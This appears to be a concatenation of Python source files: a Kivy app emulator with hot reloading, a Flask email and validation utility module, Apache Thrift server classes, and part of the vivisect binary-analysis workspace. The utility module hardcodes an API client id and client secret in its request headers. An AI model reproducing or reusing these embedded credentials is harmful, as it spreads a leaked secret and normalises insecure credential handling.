def _reload_from_watchdog(self, event): from watchdog.events import FileModifiedEvent if not isinstance(event, FileModifiedEvent): return for pat in self.AUTORELOADER_IGNORE_PATTERNS: if fnmatch(event.src_path, pat): return if event.src_path.endswith(".py"): # source changed, reload it try: Builder.unload_file(event.src_path) self._reload_py(event.src_path) except Exception as e: import traceback self.set_error(repr(e), traceback.format_exc()) return if event.src_path.endswith(".kv"): origin = str(event.src_path).split('.') main_path = str(event.src_path).split('\\')[:-1] main_path = "\\".join(main_path) print(main_path) if 'main.py' in os.listdir(main_path): new_path = os.path.join(main_path,'main.py') try: Builder.unload_file(new_path) self._reload_py(new_path) except Exception as e: import traceback self.set_error(repr(e), traceback.format_exc()) return print("reload cause of", event) print(event.src_path, "this is the file that caused the reload") print(self.filename,"this is the original filename") Clock.unschedule(self.rebuild) Clock.schedule_once(self.rebuild, 0.1) def _reload_py(self, filename): # we don't have dependency graph yet, so if the module actually exists # reload it. filename = realpath(filename) print("filename from realpath") # check if it's our own application file try: mod = sys.modules[self.__class__.__module__] mod_filename = realpath(mod.__file__) except Exception as e: mod_filename = None # detect if it's the application class // main if mod_filename == filename: return self._restart_app(mod) module = self._filename_to_module(filename) if module in sys.modules: Logger.debug("{}: Module exist, reload it".format(self.appname)) Factory.unregister_from_filename(filename) self._unregister_factory_from_module(module) reload(sys.modules[module]) def _unregister_factory_from_module(self, module): # check module directly to_remove = [ x for x in Factory.classes if Factory.classes[x]["module"] == module] # check class name for x in Factory.classes: cls = Factory.classes[x]["cls"] if not cls: continue if getattr(cls, "__module__", None) == module: to_remove.append(x) for name in set(to_remove): del Factory.classes[name] def _filename_to_module(self, filename): orig_filename = filename rootpath = self.get_root_path() if filename.startswith(rootpath): filename = filename[len(rootpath):] if filename.startswith("/"): filename = filename[1:] module = filename[:-3].replace("/", ".") print("translated to",orig_filename,module) # Logger.debug("{}: Translated {} to {}".format(self.appname, orig_filename, module)) return module def _restart_app(self, mod): _has_execv = sys.platform != 'win32' cmd = [sys.executable] + original_argv if not _has_execv: import subprocess subprocess.Popen(cmd) sys.exit(0) else: try: os.execv(sys.executable, cmd) except OSError: os.spawnv(os.P_NOWAIT, sys.executable, cmd) os._exit(0) def prepare_foreground_lock(self): """ Try forcing app to front permanently to avoid windows pop ups and notifications etc.app Requires fake fullscreen and borderless. .. note:: This function is called automatically if `FOREGROUND_LOCK` is set """ try: import ctypes LSFW_LOCK = 1 ctypes.windll.user32.LockSetForegroundWindow(LSFW_LOCK) Logger.info("App: Foreground lock activated") except Exception: Logger.warn("App: No foreground lock available") def set_widget(self, wid): """ Clear the root container, and set the new approot widget to `wid` """ self.root.clear_widgets() self.approot = wid if wid is None: return self.root.add_widget(self.approot) try: wid.do_layout() except Exception: pass def get_root_path(self): """ Return the root file path """ return realpath(os.getcwd()) # State management def apply_state(self, state): """Whatever the current state is, reapply the current state """ pass # Idle management leave def install_idle(self, timeout=60): """ Install the idle detector. Default timeout is 60s. Once installed, it will check every second if the idle timer expired. The timer can be rearm using :func:`rearm_idle`. """ if monotonic is None: Logger.exception("{}: Cannot use idle detector, monotonic is missing".format(self.appname)) self.idle_timer = None self.idle_timeout = timeout Clock.schedule_interval(self._check_idle, 1) self.root.bind( on_touch_down=self.rearm_idle, on_touch_up=self.rearm_idle) def _check_idle(self, *largs): if not hasattr(self, "idle_timer"): return if self.idle_timer is None: return if monotonic() - self.idle_timer > self.idle_timeout: self.idle_timer = None self.dispatch("on_idle") def rearm_idle(self, *largs): """ Rearm the idle timer """ if not hasattr(self, "idle_timer"): return if self.idle_timer is None: self.dispatch("on_wakeup") self.idle_timer = monotonic() def on_idle(self, *largs): """ Event fired when the application enter the idle mode """ pass def on_wakeup(self, *largs): """ Event fired when the application leaves idle mode """ pass # internals def patch_builder(self): Builder.orig_load_string = Builder.load_string Builder.load_string = self._builder_load_string def _builder_load_string(self, string, **kwargs): if "filename" not in kwargs: from inspect import getframeinfo, stack caller = getframeinfo(stack()[1][0]) kwargs["filename"] = caller.filename return Builder.orig_load_string(string, **kwargs) # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! def watchdog_reloader(self,args): print("reloading begins ") # self.AUTORELOADER_PATHS = self.AUTORELOADER_PATHS self.enable_autoreload() self.patch_builder() def choose(self): filechooser.open_file(on_selection=self.handle_selection) def handle_selection(self, selection): self.selection = selection def on_selection(self, *a, **k): self.clear() def clear(self): try: print("clearing screen") self.root.ids.emulator_screen.clear_widgets() Window.borderless = True Clock.schedule_once(self.watchdog_reloader, 2) self.filename = str(self.selection[0]) base = "\\".join(self.filename.split("\\")[:-1]) print(base) self.AUTORELOADER_PATHS.clear() self.AUTORELOADER_PATHS.append((base, {"recursive": True})) history = JsonStore(history_path) if history.exists(self.filename): print("file already exists") else: print('creating a new file with json store') history.put(self.filename,file_name=self.filename) self.emulate_file(self.selection[0]) print(self.AUTORELOADER_PATHS) except: pass def build(self): return EmuInterface() def emulate_file(self, filename, threaded=False): root = None if not os.path.exists(filename): return dirname = os.path.dirname(filename) sys.path.append(dirname) os.chdir(dirname) resource_add_path(dirname) # self.root.ids.emulator_screen.clear_widgets() if threaded: Thread(target=partial(self.start_emulation, filename, threaded=threaded)).start() else: self.start_emulation(filename, threaded=threaded) def start_emulation(self, filename, threaded=False): print("___________________________________") print("Starting thread") root = None # print(os.path.splitext(filename)) if os.path.splitext(filename)[1] == '.kv': # load the kivy file directly try: # cahching error with kivy files Builder.unload_file(filename) # print("unloaded the kv") root = Builder.load_file(filename) except: traceback.print_exc() print("You kivy file has a problem") elif os.path.splitext(filename)[1] == '.py': print("its a py") self.load_defualt_kv(filename) try: # cahching error with python files root = self.load_py_file(filename) except: traceback.print_exc() print("You python file has a problem") if root: print("this is the root",root) if threaded: self.emulation_done(root, filename) else: print("not threaded") self.root.ids.emulator_screen.clear_widgets() self.root.ids.emulator_screen.add_widget(root) dirname = os.path.dirname(filename) sys.path.pop() resource_remove_path(dirname) @mainthread def emulation_done(self, root, filename): if root: self.root.ids.emulator_screen.add_widget(root) def load_defualt_kv(self, filename): app_cls_name = self.get_app_cls_name(filename) self.class_name = app_cls_name if app_cls_name is None: return kv_name = app_cls_name.lower() if app_cls_name.endswith('App'): kv_name = app_cls_name[:len(app_cls_name) - 3].lower() if app_cls_name: file_dir = os.path.dirname(filename) kv_filename = os.path.join(file_dir, kv_name + '.kv') print(kv_filename) if os.path.exists(kv_filename): try: # cahching error with kivy files Builder.unload_file(kv_filename) print("unloaded the kv file ") # self.root.ids.emulator_screen.clear_widgets() print("clearing the emulator screen here") # self.root.ids.emulator_screen.clear_widgets() root = Builder.load_file(kv_filename) except: traceback.print_exc() print("You kivy file has a problem") def get_app_cls_name(self, filename): with open(filename) as fn: text = fn.read() lines = text.splitlines() app_cls = self.get_import_as('from kivy.app import App', lines) def check_app_cls(line): line = line.strip() return line.startswith('class') and line.endswith('(%s):' % app_cls) found = list(filter(check_app_cls, lines)) if found: line = found[0] cls_name = line.split('(')[0].split(' ')[1] return cls_name def get_root_from_runTouch(self,filename): with open(filename) as fn: text = fn.read() lines = text.splitlines() run_touch = self.get_import_as('from kivy.base import runTouchApp', lines) def check_run_touch(line): line = line.strip() return line.startswith('%s(' % run_touch) found = list(filter(check_run_touch, lines)) if found: line = found[0] root_name = line.strip().split('(')[1].split(')')[0] root_file = self.import_from_dir(filename) root = getattr(reload(root_file), root_name) return root def load_py_file(self, filename): app_cls_name = self.get_app_cls_name(filename) if app_cls_name: root_file = self.import_from_dir(filename) app_cls = getattr(reload(root_file), app_cls_name) root = app_cls().build() return root run_root = self.get_root_from_runTouch(filename) if run_root: return run_root def import_from_dir(self, filename): ''' force python to import this file from the project_ dir''' dirname, file = os.path.split(filename) sys.path = [dirname] + sys.path import_word = os.path.splitext(file)[0] imported = __import__(import_word) return imported def get_import_as(self, start, lines): line = list(filter(lambda line: line.strip().startswith(start), lines)) if line: words = line[0].split(' ') import_word = words[len(words) - 1] return import_word else: return def callback_for_menu_items(self, *args): toast(args[0]) def show_example_bottom_sheet(self): from kivymd.bottomsheet import MDListBottomSheet if not self.bs_menu_1: self.bs_menu_1 = MDListBottomSheet() self.bs_menu_1.add_item( "Open File", lambda x: self.choose(), icon='file') self.bs_menu_1.add_item( "Open History Tab", lambda x: self.history_screen(), icon='history') self.bs_menu_1.add_item( "Close Emulator", lambda x: self.stop(), icon='window-close') self.bs_menu_1.open() def history_screen(self): print(self.filename) self.root.ids.emulator_screen.clear_widgets() self.root.ids.history_screen.clear_widgets() self.root.ids.screen_manager.current = "history_screen" if __name__ == '__main__': KivyEmu().run()
utility.py
import os import json import re import http.client import logging from flask import render_template from json2html import * from threading import Thread from flask import current_app from flask_mail import Message from . import mail from . import watson_conversion,cloudant_nosql_db from automation import requestsloader def send_async_email(app, msg): with app.app_context(): mail.send(msg) def send_email(to, subject, confirm_link, template=None ): app = current_app._get_current_object() msg = Message(subject, sender=app.config['MAIL_SENDER'], recipients=[to]) # msg.body = render_template(template + '.txt', **kwargs) msg.html = render_template(template + '.html', confirm_link=confirm_link) thr = Thread(target=send_async_email, args=[app, msg]) thr.start() return thr def send_email_api(to, sender, subject, confirm_link): conn = http.client.HTTPSConnection("w3.api.ibm.com") payload = "{\"to\":[\"%s\"]," \ "\"from\":\"%s\"," \ "\"subject\":\"%s\"," \ "\"body\":" \ "\"Hi, <br> You are receiving an email to confirm the access request. The link is : <br> %s\"}" \ % (to, sender, subject, confirm_link) headers = { 'x-ibm-client-id': "352c77cc-68cc-4d73-a5e5-ef10866719ed", 'x-ibm-client-secret': "I0qT0tJ3vE7vB7oS7eX1dM5sP0oY7rP1hW1sN3mE2yB2eX5uM1", 'content-type': "application/json", 'accept': "application/json" } conn.request("POST", "/common/run/email/sendmail", payload, headers) res = conn.getresponse() data = res.read() print(data.decode("utf-8")) def get_approver(emailAddress): return emailAddress def convert_2_html(excel_content): excel_json = json.dumps(excel_content) excel_html = json2html.convert(json=excel_json, table_attributes="id=\"table-7\"") return excel_html def read_excel_with_emai(filename): rl = requestsloader.RequestsLoader() rl.load_workbook(filename) excel_content = rl.get_requests_str() email_addr = rl.get_email() return excel_content, email_addr def read_excel(filename): rl = requestsloader.RequestsLoader() rl.load_workbook(filename) excel_content = rl.get_requests_str() return excel_content def verify_template(excel_content): if excel_content[0].get('Select Report Level'): return True def verify_email_format(addr): if not addr: return False RE_EMAIL = re.compile(r'^[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+){0,4}@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+){0,4}$') return RE_EMAIL.match(addr) def verify_select_level(rpt_level, sel_cty_comp): RE_CTY_CODE = re.compile(r'.*\d{3}.*') print(rpt_level, sel_cty_comp) if rpt_level == 'Company Level' and not RE_CTY_CODE.search(sel_cty_comp): return False else: return True def verify_date(start_date, end_date): RE_DATE = re.compile('\d{4}[-/]\d{2}[-/]\d{2}') if RE_DATE.match(start_date) and RE_DATE.match(end_date): return True def verify_input(input_val): if not input_val: return False elif '\n' in input_val: return False return True def convert_country(country): re_country = re.split(': ', country) return '{}'.format(re_country[1]) # def convert_company(company): re_comp = re.split(': ', company) return '{}({})'.format(re_comp[1], re_comp[0])
TServer.py
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # from six.moves import queue import logging import os import threading from thrift.protocol import TBinaryProtocol from thrift.transport import TTransport logger = logging.getLogger(__name__) class TServer(object): """Base interface for a seak.vassar_server.server, which must have a serve() method. Three constructors for all servers: 1) (processor, serverTransport) 2) (processor, serverTransport, transportFactory, protocolFactory) 3) (processor, serverTransport, inputTransportFactory, outputTransportFactory, inputProtocolFactory, outputProtocolFactory) """ def __init__(self, *args): if (len(args) == 2): self.__initArgs__(args[0], args[1], TTransport.TTransportFactoryBase(), TTransport.TTransportFactoryBase(), TBinaryProtocol.TBinaryProtocolFactory(), TBinaryProtocol.TBinaryProtocolFactory()) elif (len(args) == 4): self.__initArgs__(args[0], args[1], args[2], args[2], args[3], args[3]) elif (len(args) == 6): self.__initArgs__(args[0], args[1], args[2], args[3], args[4], args[5]) def __initArgs__(self, processor, serverTransport, inputTransportFactory, outputTransportFactory, inputProtocolFactory, outputProtocolFactory): self.processor = processor self.serverTransport = serverTransport self.inputTransportFactory = inputTransportFactory self.outputTransportFactory = outputTransportFactory self.inputProtocolFactory = inputProtocolFactory self.outputProtocolFactory = outputProtocolFactory def serve(self): pass class TSimpleServer(TServer): """Simple single-threaded seak.vassar_server.server that just pumps around one transport.""" def __init__(self, *args): TServer.__init__(self, *args) def serve(self): self.serverTransport.listen() while True: client = self.serverTransport.accept() if not client: continue itrans = self.inputTransportFactory.getTransport(client) otrans = self.outputTransportFactory.getTransport(client) iprot = self.inputProtocolFactory.getProtocol(itrans) oprot = self.outputProtocolFactory.getProtocol(otrans) try: while True: self.processor.process(iprot, oprot) except TTransport.TTransportException: pass except Exception as x: logger.exception(x) itrans.close() otrans.close() class TThreadedServer(TServer): """Threaded seak.vassar_server.server that spawns a new thread per each connection.""" def __init__(self, *args, **kwargs): TServer.__init__(self, *args) self.daemon = kwargs.get("daemon", False) def serve(self): self.serverTransport.listen() while True: try: client = self.serverTransport.accept() if not client: continue t = threading.Thread(target=self.handle, args=(client,)) t.setDaemon(self.daemon) t.start() except KeyboardInterrupt: raise except Exception as x: logger.exception(x) def handle(self, client): itrans = self.inputTransportFactory.getTransport(client) otrans = self.outputTransportFactory.getTransport(client) iprot = self.inputProtocolFactory.getProtocol(itrans) oprot = self.outputProtocolFactory.getProtocol(otrans) try: while True: self.processor.process(iprot, oprot) except TTransport.TTransportException: pass except Exception as x: logger.exception(x) itrans.close() otrans.close() class TThreadPoolServer(TServer): """Server with a fixed size pool of threads which service requests.""" def __init__(self, *args, **kwargs): TServer.__init__(self, *args) self.clients = queue.Queue() self.threads = 10 self.daemon = kwargs.get("daemon", False) def setNumThreads(self, num): """Set the number of worker threads that should be created""" self.threads = num def serveThread(self): """Loop around getting clients from the shared queue and process them.""" while True: try: client = self.clients.get() self.serveClient(client) except Exception as x: logger.exception(x) def serveClient(self, client): """Process input/output from a client for as long as possible""" itrans = self.inputTransportFactory.getTransport(client) otrans = self.outputTransportFactory.getTransport(client) iprot = self.inputProtocolFactory.getProtocol(itrans) oprot = self.outputProtocolFactory.getProtocol(otrans) try: while True: self.processor.process(iprot, oprot) except TTransport.TTransportException: pass except Exception as x: logger.exception(x) itrans.close() otrans.close() def serve(self): """Start a fixed number of worker threads and put client into a queue""" for i in range(self.threads): try: t = threading.Thread(target=self.serveThread) t.setDaemon(self.daemon) t.start() except Exception as x: logger.exception(x) # Pump the socket for clients self.serverTransport.listen() while True: try: client = self.serverTransport.accept() if not client: continue self.clients.put(client) except Exception as x: logger.exception(x) class TForkingServer(TServer): """A Thrift seak.vassar_server.server that forks a new process for each request This is more scalable than the threaded seak.vassar_server.server as it does not cause GIL contention. Note that this has different semantics from the threading seak.vassar_server.server. Specifically, updates to shared variables will no longer be shared. It will also not work on windows. This code is heavily inspired by SocketServer.ForkingMixIn in the Python stdlib. """ def __init__(self, *args): TServer.__init__(self, *args) self.children = [] def serve(self): def try_close(file): try: file.close() except IOError as e: logger.warning(e, exc_info=True) self.serverTransport.listen() while True: client = self.serverTransport.accept() if not client: continue try: pid = os.fork() if pid: # parent # add before collect, otherwise you race w/ waitpid self.children.append(pid) self.collect_children() # Parent must close socket or the connection may not get # closed promptly itrans = self.inputTransportFactory.getTransport(client) otrans = self.outputTransportFactory.getTransport(client) try_close(itrans) try_close(otrans) else: itrans = self.inputTransportFactory.getTransport(client) otrans = self.outputTransportFactory.getTransport(client) iprot = self.inputProtocolFactory.getProtocol(itrans) oprot = self.outputProtocolFactory.getProtocol(otrans) ecode = 0 try: try: while True: self.processor.process(iprot, oprot) except TTransport.TTransportException: pass except Exception as e: logger.exception(e) ecode = 1 finally: try_close(itrans) try_close(otrans) os._exit(ecode) except TTransport.TTransportException: pass except Exception as x: logger.exception(x) def collect_children(self): while self.children: try: pid, status = os.waitpid(0, os.WNOHANG) except os.error: pid = None if pid: self.children.remove(pid) else: break
__init__.py
""" Yay! It's NOT IDA!!!1!!1!one! """ import os import re import sys import time import string import hashlib import logging import binascii import itertools import traceback import threading import contextlib import collections try: import Queue except ModuleNotFoundError: import queue as Queue # The envi imports... import envi import envi.bits as e_bits import envi.memory as e_mem import envi.common as e_common import envi.config as e_config import envi.bytesig as e_bytesig import envi.symstore.resolver as e_resolv import envi.symstore.symcache as e_symcache import vstruct import vstruct.cparse as vs_cparse import vstruct.primitives as vs_prims import vivisect.base as viv_base import vivisect.parsers as viv_parsers import vivisect.codegraph as viv_codegraph import vivisect.impemu.lookup as viv_imp_lookup from vivisect.exc import * from vivisect.const import * from vivisect.defconfig import * import vivisect.analysis.generic.emucode as v_emucode logger = logging.getLogger(__name__) STOP_LOCS = (LOC_STRING, LOC_UNI, LOC_STRUCT, LOC_CLSID, LOC_VFTABLE, LOC_IMPORT, LOC_PAD, LOC_NUMBER) def guid(size=16): return binascii.hexlify(os.urandom(size)) class VivWorkspace(e_mem.MemoryObject, viv_base.VivWorkspaceCore): ''' VivWorkspace is the heart of vivisect's binary analysis. Most APIs accept a VivWorkspace as their first parameter, and the workspace is responsible for all the user facing functions of getters/adders, running analysis passes, making the various locations, loading files, and more. Current keyword arguments: * confdir: * Type: String (path to directory) * Description: A path to a directory to save/load vivisect's analysis configuration options (options will be saved to/loaded from the viv.json file in the directory * Default: $HOME/.viv/ * autosave (boolean): * Type: Boolean * Description: If true, autosave any configuration changes to the <confdir>/viv.json upon changing them. * Default: False ''' def __init__(self, **kwargs): e_mem.MemoryObject.__init__(self) viv_base.VivWorkspaceCore.__init__(self) autosave = kwargs.get('autosave', False) cfgdir = kwargs.get('confdir', None) if cfgdir: self.vivhome = os.path.abspath(cfgdir) else: self.vivhome = e_config.gethomedir(".viv", makedir=autosave) self._viv_gui = None # If a gui is running, he will put a ref here... self.saved = True # TODO: where is this used? self.rchan = None self.server = None self.chanids = itertools.count() self.arch = None # The placeholder for the Envi architecture module self.psize = None # Used so much, optimization is appropriate cfgpath = os.path.join(self.vivhome, 'viv.json') self.config = e_config.EnviConfig(filename=cfgpath, defaults=defconfig, docs=docconfig, autosave=autosave) # Ideally, *none* of these are modified except by _handleFOO funcs... self.segments = [] self.exports = [] self.imports = [] self.codeblocks = [] self.relocations = [] self._dead_data = [] self.iscode = {} self.xrefs = [] self.xrefs_by_to = {} self.xrefs_by_from = {} # XXX - make config option self.greedycode = 0 self.metadata = {} self.comments = {} # Comment by VA. self.symhints = {} self.filemeta = {} # Metadata Dicts stored by filename self.transmeta = {} # Metadata that is *not* saved/evented self.cfctx = viv_base.VivCodeFlowContext(self) self.va_by_name = {} self.name_by_va = {} self.codeblocks_by_funcva = {} self.exports_by_va = {} self.colormaps = {} self.vasetdefs = {} self.vasets = {} self.reloc_by_va = {} self.func_args = {} self.funcmeta = {} # Function metadata stored in the workspace self.frefs = {} # Extended analysis modules self.amods = {} self.amodlist = [] # Extended *function* analysis modules self.fmods = {} self.fmodlist = [] self.chan_lookup = {} self.nextchanid = 1 self._cached_emus = {} # The function entry signature decision tree # FIXME add to export self.sigtree = e_bytesig.SignatureTree() self.siglist = [] self._initEventHandlers() # Some core meta types that exist self.setMeta('NoReturnApis', {}) self.setMeta('SymbolikImportEmulation', None) # Default to basic file storage self.setMeta("StorageModule", "vivisect.storage.basicfile") # There are a few default va sets for use in analysis self.addVaSet('EntryPoints', (('va', VASET_ADDRESS),)) self.addVaSet('NoReturnCalls', (('va', VASET_ADDRESS),)) self.addVaSet("Emulation Anomalies", (("va", VASET_ADDRESS), ("Message", VASET_STRING))) self.addVaSet("Bookmarks", (("va", VASET_ADDRESS), ("Bookmark Name", VASET_STRING))) self.addVaSet('DynamicBranches', (('va', VASET_ADDRESS), ('opcode', VASET_STRING), ('bflags', VASET_INTEGER))) self.addVaSet('SwitchCases', (('va', VASET_ADDRESS), ('setup_va', VASET_ADDRESS), ('Cases', VASET_INTEGER))) self.addVaSet('PointersFromFile', (('va', VASET_ADDRESS), ('target', VASET_ADDRESS), ('file', VASET_STRING), ('comment', VASET_STRING), )) self.addVaSet('CodeFragments', (('va', VASET_ADDRESS), ('calls_from', VASET_COMPLEX))) self.addVaSet('EmucodeFunctions', (('va', VASET_ADDRESS),)) self.addVaSet('FuncWrappers', (('va', VASET_ADDRESS), ('wrapped_va', VASET_ADDRESS),)) def vprint(self, msg): logger.info(msg) def getVivGui(self): ''' Return a reference to the vivisect GUI object for this workspace. If the GUI is not running (aka, the workspace is being used programatically) this routine returns None. Example: vwgui = vw.getVivGui() if vwgui: vwgui.doStuffAndThings() ''' return self._viv_gui def getVivGuid(self): ''' Return the GUID for this workspace. Every newly created VivWorkspace should have a unique GUID, for identifying a particular workspace for a given binary/process-space versus another created at a different time. Filesystem-copies of the same workspace will have the same GUID by design. This easily allows for workspace-specific GUI layouts as well as comparisons of Server-based workspaces to the original file- based workspace used to store to the server. ''' vivGuid = self.getMeta('GUID') if vivGuid is None: vivGuid = guid() self.setMeta('GUID', vivGuid) return vivGuid def loadWorkspace(self, wsname): mname = self.getMeta("StorageModule") mod = self.loadModule(mname) mod.loadWorkspace(self, wsname) self.setMeta("StorageName", wsname) # The event list thusfar came *only* from the load... self._createSaveMark() # Snapin our analysis modules self._snapInAnalysisModules() def addFref(self, fva, va, idx, val): """ Add a reference from the operand at virtual address 'va' index 'idx' to a function local offset. Positive values (beginning with 0) are considered argument references. Negative values are considered function local storage and are relative to the stack pointer at function entry. """ # FIXME this should probably be an argument r = (va, idx, val) self._fireEvent(VWE_ADDFREF, r) def getFref(self, va, idx): """ Get back the fref value (or None) for the given operand index from the instruction at va. """ return self.frefs.get((va, idx)) def getEmulator(self, logwrite=False, logread=False): """ Get an instance of a WorkspaceEmulator for this workspace. Use logread/logwrite to enable memory access tracking. """ plat = self.getMeta('Platform') arch = self.getMeta('Architecture') eclass = viv_imp_lookup.workspace_emus.get((plat, arch)) if eclass is None: eclass = viv_imp_lookup.workspace_emus.get(arch) if eclass is None: raise Exception("WorkspaceEmulation not supported on %s yet!" % arch) emu = eclass(self, logwrite=logwrite, logread=logread) emu.setEndian(self.getEndian()) return emu def getCachedEmu(self, emuname): """ Get a cached emulator by name. If one doesn't exist it is created and then cached. """ emu = self._cached_emus.get(emuname) if emu is None: emu = self.getEmulator() self._cached_emus[emuname] = emu return emu def addLibraryDependancy(self, libname): """ Add a *normalized* library name to the import search chain for this binary. This is only needed for formats whose imports don't explicitly state their library name. """ # FIXME this needs to be event enabled... either plumb it special, # or allow the get/append/set race... dl = self.getMeta("DepLibs", None) if dl is None: dl = [] dl.append(libname) self.setMeta("DepLibs", dl) def getLibraryDependancies(self): ''' Retrieve the list of *normalized* library dependancies. ''' dl = self.getMeta("DepLibs", None) if dl is None: return [] return list(dl) def setComment(self, va, comment, check=False): ''' Set the humon readable comment for a given virtual. Comments will be displayed by the code renderer, and are an important part of this balanced breakfast. Example: vw.setComment(callva, "This actually calls FOO...") ''' if check and self.comments.get(va): return self._fireEvent(VWE_COMMENT, (va, comment)) def getComment(self, va): ''' Returns the comment string (or None) for a given virtual address. Example: cmnt = vw.getComment(va) print('COMMENT: %s' % cmnt) ''' return self.comments.get(va) def getComments(self): ''' Retrieve all the comments in the viv workspace as (va, cmnt) tuples. Example: for va,cmnt in vw.getComments(): print('Comment at 0x%.8x: %s' % (va, cmnt)) ''' return self.comments.items() def addRelocation(self, va, rtype, data=None): """ Add a relocation entry for tracking. Expects data to have whatever is necessary for the reloc type. eg. addend """ # split "current" va into fname and offset. future relocations will want to base all va's from an image base mmva, mmsz, mmperm, fname = self.getMemoryMap(va) # FIXME: getFileByVa does not obey file defs imgbase = self.getFileMeta(fname, 'imagebase') offset = va - imgbase self._fireEvent(VWE_ADDRELOC, (fname, offset, rtype, data)) def getRelocations(self): """ Get the current list of relocation entries. """ return self.relocations def getRelocation(self, va): """ Return the type of relocation at the specified VA or None if there isn't a relocation entry for the address. """ return self.reloc_by_va.get(va) def pointerString(self, va): return self.arch.pointerString(va) def getAnalysisModuleNames(self): return list(self.amodlist) def getFuncAnalysisModuleNames(self): return list(self.fmodlist) def addFunctionSignatureBytes(self, bytez, mask=None): """ Add a function signature entry by bytes. This is mostly used by file parsers/loaders to manually tell the workspace about known entry signature types. see envi.bytesig for details. """ self.sigtree.addSignature(bytez, mask) self.siglist.append((bytez, mask)) def isFunctionSignature(self, va): """ Check if the specified va is a function entry signature according to the current entry point signature tree... """ if not self.isValidPointer(va): return False offset, bytes = self.getByteDef(va) return self.sigtree.isSignature(bytes, offset=offset) def addNoReturnApi(self, funcname): """ Inform vivisect code-flow disassembly that any call target which matches the specified name ("funcname" or "libname.funcname" for imports) does *not* exit and code-flow should be stopped... """ funcname = funcname.lower() m = self.getMeta('NoReturnApis', {}) m[funcname] = True self.setMeta('NoReturnApis', m) noretva = self.getMeta('NoReturnApisVa', {}) # If we already have an import entry, we need to update codeflow for lva, lsize, ltype, linfo in self.getImports(): if linfo.lower() != funcname: continue self.cfctx.addNoReturnAddr(lva) noretva[lva] = True self.setMeta('NoReturnApisVa', noretva) def addNoReturnApiRegex(self, funcre): ''' Inform vivisect code-flow disassembly that any call target which matches the specified regex ("funcname" or "libname.funcname" for imports) does *not* exit and code-flow should be stopped... ''' c = re.compile(funcre, re.IGNORECASE) m = self.getMeta('NoReturnApisRegex', []) m.append(funcre) self.setMeta('NoReturnApisRegex', m) for lva, lsize, ltype, linfo in self.getImports(): if c.match(linfo): self.addNoReturnApi(linfo) def isNoReturnVa(self, va): ''' Check if a VA is a no return API ''' return self.getMeta('NoReturnApisVa', {}).get(va, False) def checkNoRetApi(self, apiname, va): ''' Called as new APIs (thunks) are discovered, checks to see if they wrap a NoReturnApi. Updates if it is a no ret API thunk ''' noretva = self.getMeta('NoReturnApisVa', {}) for funcre in self.getMeta('NoReturnApisRegex', []): c = re.compile(funcre, re.IGNORECASE) if c.match(apiname): self.cfctx.addNoReturnAddr(va) noretva[va] = True for funcname in self.getMeta('NoReturnApis', {}).keys(): if funcname.lower() == apiname.lower(): self.cfctx.addNoReturnAddr(va) noretva[va] = True self.setMeta('NoReturnApisVa', noretva) def addAnalysisModule(self, modname): """ Add an analysis module by python import path """ if modname in self.amods: return mod = self.loadModule(modname) self.amods[modname] = mod self.amodlist.append(modname) logger.debug('Adding Analysis Module: %s', modname) def delAnalysisModule(self, modname): """ Remove an analysis module from the list used during analysis() """ if modname not in self.amods: raise Exception("Unknown Module in delAnalysisModule: %s" % modname) x = self.amods.pop(modname, None) if x is not None: self.amodlist.remove(modname) def loadModule(self, modname): __import__(modname) return sys.modules[modname] def addFuncAnalysisModule(self, modname): """ Snap in a per-function analysis module (by name) which will be triggered during the creation of a new function (makeFunction). """ if modname in self.fmods: return mod = self.loadModule(modname) self.fmods[modname] = mod self.fmodlist.append(modname) logger.debug('Adding Function Analysis Module: %s', modname) def delFuncAnalysisModule(self, modname): ''' Remove a currently registered function analysis module. Example: vw.delFuncAnalysisModule('mypkg.mymod') ''' x = self.fmods.pop(modname, None) if x is None: raise Exception("Unknown Module in delAnalysisModule: %s" % modname) self.fmodlist.remove(modname) def createEventChannel(self): chanid = self.chanids.next() self.chan_lookup[chanid] = Queue.Queue() return chanid def importWorkspace(self, wsevents): """ Import and initialize data from the given vivisect workspace export. """ # During import, if we have a server, be sure not to notify # the server about the events he just gave us... local = False if self.server is not None: local = True # Process the events from the import data... fe = self._fireEvent for event, einfo in wsevents: fe(event, einfo, local=local) return def exportWorkspace(self): ''' Return the (probably big) list of events which define this workspace. ''' return self._event_list def exportWorkspaceChanges(self): ''' Export the list of events which have been applied to the workspace since the last save. ''' return self._event_list[self._event_saved:] def initWorkspaceClient(self, remotevw): """ Initialize this workspace as a workspace client to the given (potentially cobra remote) workspace object. """ uname = e_config.getusername() self.server = remotevw self.rchan = remotevw.createEventChannel() self.server.vprint('%s connecting...' % uname) wsevents = self.server.exportWorkspace() self.importWorkspace(wsevents) self.server.vprint('%s connection complete!' % uname) thr = threading.Thread(target=self._clientThread) thr.setDaemon(True) thr.start() def _clientThread(self): """ The thread that monitors events on a server to stay in sync. """ if self.server is None: raise Exception("_clientThread() with no server?!?!") while self.server is not None: event, einfo = self.server.waitForEvent(self.rchan) self._fireEvent(event, einfo, local=True) def waitForEvent(self, chanid, timeout=None): """ Return an event,eventinfo tuple. """ q = self.chan_lookup.get(chanid) if q is None: raise Exception("Invalid Channel") return q.get(timeout=timeout) def deleteEventChannel(self, chanid): """ Remove a previously allocated event channel from the workspace. """ self.chan_lookup.pop(chanid) def reprPointer(vw, va): """ Do your best to create a humon readable name for the value of this pointer. note: This differs from parent function from envi.cli: * Locations database is checked * Strings are returned, not named (partially) * <function> + 0x<offset> is returned if inside a function * <filename> + 0x<offset> is returned instead of loc_##### """ if va == 0: return "NULL" loc = vw.getLocation(va) if loc is not None: locva, locsz, lt, ltinfo = loc if lt in (LOC_STRING, LOC_UNI): return vw.reprVa(locva) mbase, msize, mperm, mfile = vw.getMemoryMap(va) ret = mfile + " + 0x%x" % (va - mbase) sym = vw.getName(va, smart=True) if sym is not None: ret = sym return ret def reprVa(self, va): """ A 